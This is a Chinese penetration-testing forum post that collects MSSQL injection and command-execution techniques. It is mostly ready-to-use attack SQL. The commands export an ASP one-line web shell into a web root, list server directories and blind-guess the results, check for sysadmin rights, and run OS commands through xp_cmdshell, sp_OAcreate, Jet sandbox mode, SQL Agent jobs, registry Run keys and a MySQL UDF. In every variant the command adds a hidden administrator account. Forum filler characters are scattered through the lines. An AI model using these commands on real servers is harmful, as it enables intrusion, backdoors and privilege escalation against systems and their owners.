中国网络渗透测试联盟

标题: mssql实用命令及导出一句话 [打印本页]

作者: admin    时间: 2012-9-13 17:49
标题: mssql实用命令及导出一句话
MSSQL语句导出一句话木马3 z- a* S% Z: h- R. A9 x  a6 |
首先确定网站的WEB路径
! B( [+ _% M" v- W& _: ~7 H; Y, I# `1 D;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
* {; R! N8 n; C3 Q) Y, ?. C, [4 q
; ]. g; N1 H0 j) i& y( D- _  w* Q$ [;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- ( H- S/ i0 Z) {9 `- U/ N4 V
//将一句话木马插入表中
2 y" O2 O- ?+ ]! k
1 x6 B1 C$ E4 L& m* J1 \' p4 {;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- , i' g3 j6 A# [0 l! f
//导出一个ASP文件4 q6 r8 c& A2 I7 A( m; I

0 t. K+ ]( C7 W* v% p, s! l  Y5 i2 A( `  x4 e. V
关于MSSQL列目录
6 C  G# Z% H% A. a, Z# h: s9 u. Y;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
3 a) z4 r0 Y" I* [$ H2 @Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表( @; {/ N( T2 `! T
  ]; Y) M/ P3 \6 J" ?
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
4 Q6 y1 ~) [3 N" m/ R) e4 A/ u* W7 ^4 x3 X3 C1 Z
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段: x  N) V/ W7 \* H' k- E6 e

; Y2 K) G" h6 ]( H" pAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
2 n8 g8 c; Z( N
" {% i/ T  O" G" v
" N7 B1 q7 S) V% M& t0 Z数据库版本和权限查看5 j' e8 ~7 o2 }( u4 a: h
and 1=(select @@VERSION) //查看详细的数据库信息.3 j# e5 ?( w/ |0 Q7 U
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
: I. s3 ~. v+ t, r7 ~& j  uand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER. G; a  s, A& V5 D

* d5 p6 @7 G& O1 w8 O
$ Z$ A5 S: W& \8 ^9 O1.利用xp_cmdshell执行命令2 B* W$ q  T; W, N* k% \
exec master..xp_cmdshell 'net user rfire 123456 /add'
8 v% U- q& f0 J; E7 q3 hexec master..xp_cmdshell 'net localgroup administrators rfire /add'6 F8 D" _. ]" s$ i6 A# V
% Q1 e" [/ P: b% a) t& [
恢复xp_cmdshell存储过程
- e- B: m! p1 @' X4 Y" s" }  v7 @Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
2 |! c  Z0 W+ Z; `9 ]4 S& _/ p4 _
* u8 {& g& o* F6 ?4 x3 E5 T- E; f" D* S
2.利用SP_OAcreate和SP_OAMETHOD执行命令
. O# f- b5 d+ t# N$ Z在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
6 r9 a- w' x: IDECLARE @shell INT //建立一个@shell实体, C# g3 F" X' u# [
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
' i. @4 c1 K9 t, i$ q# p- a, ^EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
) a+ k3 N( D0 z( t8 [* [, g5 S6 K% z) H- K6 N, B7 F& y& D

4 L9 A% w- P4 ~: W3.利用沙盒模式! y) o- o5 V9 V' N
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
" x- P4 n7 \2 j( P  j, B开启沙盒模式:" V% [7 N8 e3 @. ?
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
1 p% H8 a& O2 Q. e& w( W, p! e  V" Z' K+ c/ l
执行命令:% Q& H- ?1 Y6 Z4 }: Z) j
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');" k+ }" ?/ Z+ `4 J" C8 f) \
3 }9 T/ F' ]& ?0 a8 ~: Q, G% [

1 [. D! y+ I6 V! G% R4.利用SQL代理执行命令
+ w6 {) ]5 T0 l" U7 REXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务0 e  ?# t. S: k% N$ {) t

+ K0 x: v$ T2 x/ r- f执行命令:
, A: P# ^+ J% ]1 n3 ]4 G3 C* |use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错$ X: a. X  @2 c0 |* r
exec sp_add_job 'x'
. H5 S  Q" K7 t7 ]' yexec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
5 U2 f# e# j& ]! Bexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业  [( a( O$ v  q, n6 ]

! h! f/ b3 L: p
/ C5 U* P1 u7 T& X5 X% W. c0 M5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
) O9 u4 ?3 U: M( z  IEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
, ]0 J( ]+ T8 q1 V5 n5 t9 T5 E& Q, j, N

; Y+ g4 F! j& ]3 R9 _6.MYSQL的命令执行/ I* ^2 z0 n# {; p/ S" v( P6 O
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
+ \& [! R6 `6 k( F: B# Q首先要在su.php下导出c:\windows\udf.dll
9 Y' T$ S6 m4 d. l+ F2 t3 O" D/ k& z, b( L导出后执行创建自定义函数命令:( ^9 e8 x1 i5 T0 V5 W
Create Function cmdshell returns string soname 'udf.dll'4 F6 B- ^  x$ K, Q$ [4 C+ T0 F; i* S/ g
执行命令1 s( r5 s7 A" b9 ]' L/ R% B
select cmdshell('net user rfire 123456 /add')
& F1 S& f4 [; ^执行后删除函数 drop function cmdshell
9 ]' ^1 k6 S$ L$ m2 _




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2